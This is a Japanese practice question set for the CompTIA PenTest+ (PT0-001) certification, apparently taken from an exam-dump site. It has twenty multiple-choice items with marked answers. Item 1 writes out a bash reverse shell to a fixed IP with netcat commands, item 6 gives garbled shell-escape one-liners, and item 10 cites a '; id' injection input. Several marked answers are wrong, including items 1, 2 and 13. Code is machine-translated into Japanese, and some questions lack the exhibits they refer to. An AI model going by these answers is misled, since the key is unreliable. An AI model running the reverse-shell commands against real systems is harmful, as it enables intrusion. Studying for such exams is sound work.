PT0-001日本語無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

質問 1

テスターは、ターゲットシステムで次のコマンドを実行しようとしています。
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
次の追加のコマンドのどれが前のコマンドを成功させるためにテスターのLinuxシステム上で実行される必要があるでしょうか？

（A）nc -e /bin/sh 10.2.4.6. 443

（B）nc 10.2.4.6. 443

（C）nc -nlvp 443

（D）nc -w3 10.2.4.6 443

正解：A 解答を投票する

質問 2

ペネトレーションテスターは、最終レポートでDNSサーバーを悪用するために使用されるコードを提供する必要があります。ペネトレーションテスターは、レポートの次のどの部分にコードを配置する必要がありますか？

（A）修復

（B）技術概要

（C）エグゼクティブサマリー

（D）結論

正解：C 解答を投票する

質問 3

システムセキュリティエンジニアは、いくつかの新しいアプリケーションのセキュリティ評価を実施する準備をしています。アプリケーションは、JARファイルのみを含むセットとしてエンジニアに提供されました。これらのアプリケーションの内部動作に関する情報を収集するための最も詳細な方法は、次のうちどれですか？

（A）アプリケーションを逆コンパイルしてソースコードを概算し、手動で確認します

（B）JARフィレットで静的コードアナライザーを使用して、コード品質の欠陥を探します

（C）コードとアプリケーションにデジタル署名するために使用される証明書の詳細と拡張子を確認します

（D）アプリケーションを起動し、ファジングテストを含む動的ソフトウェア分析ツールを使用します

正解：D 解答を投票する

質問 4

あるエネルギー会社がセキュリティ会社と契約して、発電所の侵入テストを実施しました。これは、ICSを使用して発電と冷却を管理していました。次のうちどれが評価の準備をするときに会社によってなされなければならないそのような環境に特有の考察ですか？

（A）潜在的な運用上および安全上の問題

（B）テストで使用されたハードウェアの電気的認証

（C）適切な一連のセキュリティテストツールの選択

（D）ICSコンポーネントの定格電流と定格荷重

正解：C 解答を投票する

質問 5

次のPythonスクリプトがあるとします。
＃1 / usr / bin / python
ソケットとしてのソケットのインポート
範囲内のポートの場合（1,1024）：
試してみてください。
sox = skt.socket（skt.AF.INET、skt.SOCK_STREAM）
sox.settimeout（1000）
sox.connect（（ '127.0.0.1'、ポート））
'％d：OPEN'％（ポート）を表示します
sox.close
除く：続ける
次のうちどれが出力が行くのでしょうか？

（A）ネットワークサーバへ

（B）/ dev / nullへ

（C）画面へ

（D）ファイルへ

正解：C 解答を投票する

質問 6

Webアプリケーション内のローカルファイルインクルードの脆弱性を悪用した後、制限されたリバースシェルが侵入テスターのワークステーションにスポーンされます。制限されたシェルをエスケープして完全に機能するTTYを作成するために使用できるのは次のうちどれですか。

（A）python -c 'import pty;pcy.3pawn("/bin/bash")'

（B）per1 -e ' : set shall=/bin/bash:shell'

（C）php -r ,Sshell=f3hellopen("/bin/bash-);exec($9he:i)'

（D）bash -i >fi /dev/localhosc Oil

正解：A 解答を投票する

質問 7

高度に規制された業界からの侵入テストのためにクライアントを関与させている間、ビジネスの観点からクライアントにとって最も重要なのは、どれですか。

（A）リスクサマリーとエグゼクティブサマリー

（B）NDAとMSA

（C）SOWと最終報告

（D）婚約状と調査結果の証明

正解：C 解答を投票する

質問 8

コンサルタントは、組織で使用されている安全でないネットワークプロトコルから資格情報を収集しようとしています。
コンサルタントは次のどのコマンドを使用する必要がありますか？

（A）Tcmpump

（B）John

（C）Hashcat

（D）nc

正解：A 解答を投票する

質問 9

以下の各パスワードを、表示される文字セットに基づいて、最も複雑度の低い（1）から最も複雑な（4）の順に並べます。各パスワードは1回しか使用できません。

正解：

質問 10

ペネトレーションテスターは、クライアントのWebフォームのセキュリティを評価しており、フィールドの1つに「; id」と入力します。
ペネトレーションテスターは、次の応答を観察します。

回答に基づいて、次の脆弱性のどれが存在しますか？

（A）コマンドインジェクション

（B）セッションハイジャック

（C）SQLインジェクション

（D）XSS / XSRF

正解：A 解答を投票する

質問 11

内部ネットワーク侵入テストは、未知のNACシステムによって保護されているネットワークに対して実行されます。NAC制限を回避するために、侵入テスターは、許可されたシステムのMACアドレスとホスト名をスプーフィングします。偽装された場合、次のデバイスのどれが最も可能性が高いですか。テスターにネットワークアクセスを提供するには？

（A）無線ルーター

（B）ユーザーワークステーション

（C）Power-over-Ethernetインジェクター

（D）ネットワーク接続プリンター

正解：D 解答を投票する

質問 12

侵入テスト担当者は、システムに「ゴースト」の脆弱性が存在するかどうかを手動で確認したいと考えています。脆弱性を検証する正しい方法は次のうちどれですか？

（A）Download the GHOST file to a Windows system and compile
gcc -o GHOST
test i:
./GHOST

（B）Download the GHOST file to a Linux system and compile
gcc -o GHOST
test i:
./GHOST

（C）Download the GHOST file to a Linux system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST

（D）Download the GHOST file to a Windows system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST

正解：C 解答を投票する

質問 13

施設での柵のジャンプを防ぐのに最適なのは次のうちどれですか？

（A）フェンスに向かって角度を付けたビデオカメラを配置します。

（B）施設とは反対側の柵にトップガードを追加します。

（C）フェンス内のリンク間の距離を短くします。

（D）施設の周囲に適切な照明を設置します。

正解：D 解答を投票する

質問 14

警備員は、バッジをスキャンした後、建物に入る個人を監視します。この施設には、回転式改札口を備えた厳格なバッジインおよびバッジアウトの要件があります。次に、警備員はバッジシステムを監査し、次のバッジの2つのログエントリを見つけます。

（A）バッジのクローンが作成されました。

（B）システムはクロスオーバーエラー率に達しました。

（C）物理アクセス制御サーバーが誤動作しています。

（D）従業員がバッジを紛失しました。

正解：A 解答を投票する

質問 15

侵入テスト担当者は、ソーシャルメディアを利用して会社の従業員に関する情報を収集しています。テスターは、従業員のプロファイルで使用されている人気のある単語のリストを作成しました。次の種類の攻撃のうちどれに対してこの情報が使用されますか？

（A）辞書

（B）セッションハイジャック

（C）エクスプロイトチェーン

（D）カルマ

正解：A 解答を投票する

質問 16

侵入テストは、スタッフの技術者、後輩の技術者によって行われました。テスト中に、技術者はアプリケーションがユーザーアカウントとパスワード情報を含むSQLテーブルを開示する可能性があることを発見しました。次のうちどれがこの発見とその重要性を経営者に通知するための最も効果的な方法ですか？

（A）この情報を使用してSQLサーバーに接続し、パスワードを1つまたは2つの重要でないアカウントに変更して、管理に対する概念実証を実証します。

（B）開発チームに発見したことを通知し、入力検証をWebアプリケーションのSQLクエリ文字列に実装することを提案します。

（C）経営者に、専門の侵入テスト会社との正式な契約を開始するためのRFPを作成するように要求します。

（D）Webアプリケーションの開示内容の概要、推奨事項、およびスクリーンショットを付けて文書化します。

正解：D 解答を投票する

質問 17

ログを確認しているときに、Web開発者はフィールドに次のユーザー入力文字列があることに気付きます。

次のタイプの攻撃のうち、Webサイトに対して行われたものはどれですか？

（A）XSSインジェクション

（B）永続的なXSS

（C）ブラインドXSS

（D）反映されたXSS

正解：A 解答を投票する

質問 18

ペネトレーションテスターは、ASP.NET Webシェルを使用してWebアプリケーションにアクセスし、テスターが企業ネットワーク内でピボットできるようにしました。
テスターがレポートを提出した後に完了する最も重要なフォローアップ活動は次のうちどれですか？

（A）シェルの取り外し

（B）調査結果の証明を提示する

（C）テスターが作成した資格情報を削除する

（D）学んだ教訓を文書化する

（E）クライアントの承認を得る

正解：B 解答を投票する

質問 19

ペネトレーションテスターは、C：\ driveを共有している匿名のFTPサーバーを検出します。次のうち、最良のエクスプロイトはどれですか？

（A）侵害されたレジストリをダウンロード、変更、および再アップロードして、コードを実行します。

（B）at.exeコマンドを使用して、テスターの特権をSYSTEMにエスカレーションします。

（C）すべてのユーザーのスタートアップフォルダーにバッチスクリプトを配置します。

（D）テスター自身のペイロードを指すようにサービスバイナリロケーションパスを変更します。

正解：D 解答を投票する

質問 20

ある企業は、インフラストラクチャに対して行われたサードパーティの侵入テストから特定された問題を修正することを決定しました。
管理者はITチームに次のことを指示する必要があります。

（A）いくつかの脆弱性に対するホットフィックスをすぐに実行します。

（B）見つかったすべての脆弱性に対してホットフィックスをすぐに実行します。

（C）見つかった脆弱性を評価し、ホットフィックスを実行します。

（D）定期的な四半期ごとのパッチ適用中にホットフィックスを実行します。

正解：C 解答を投票する

PT0-001日本語無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

弊社を連絡する

関連リンク

トップ試験

PT0-001日本語 無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

弊社を連絡する

関連リンク

トップ試験

PT0-001日本語無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」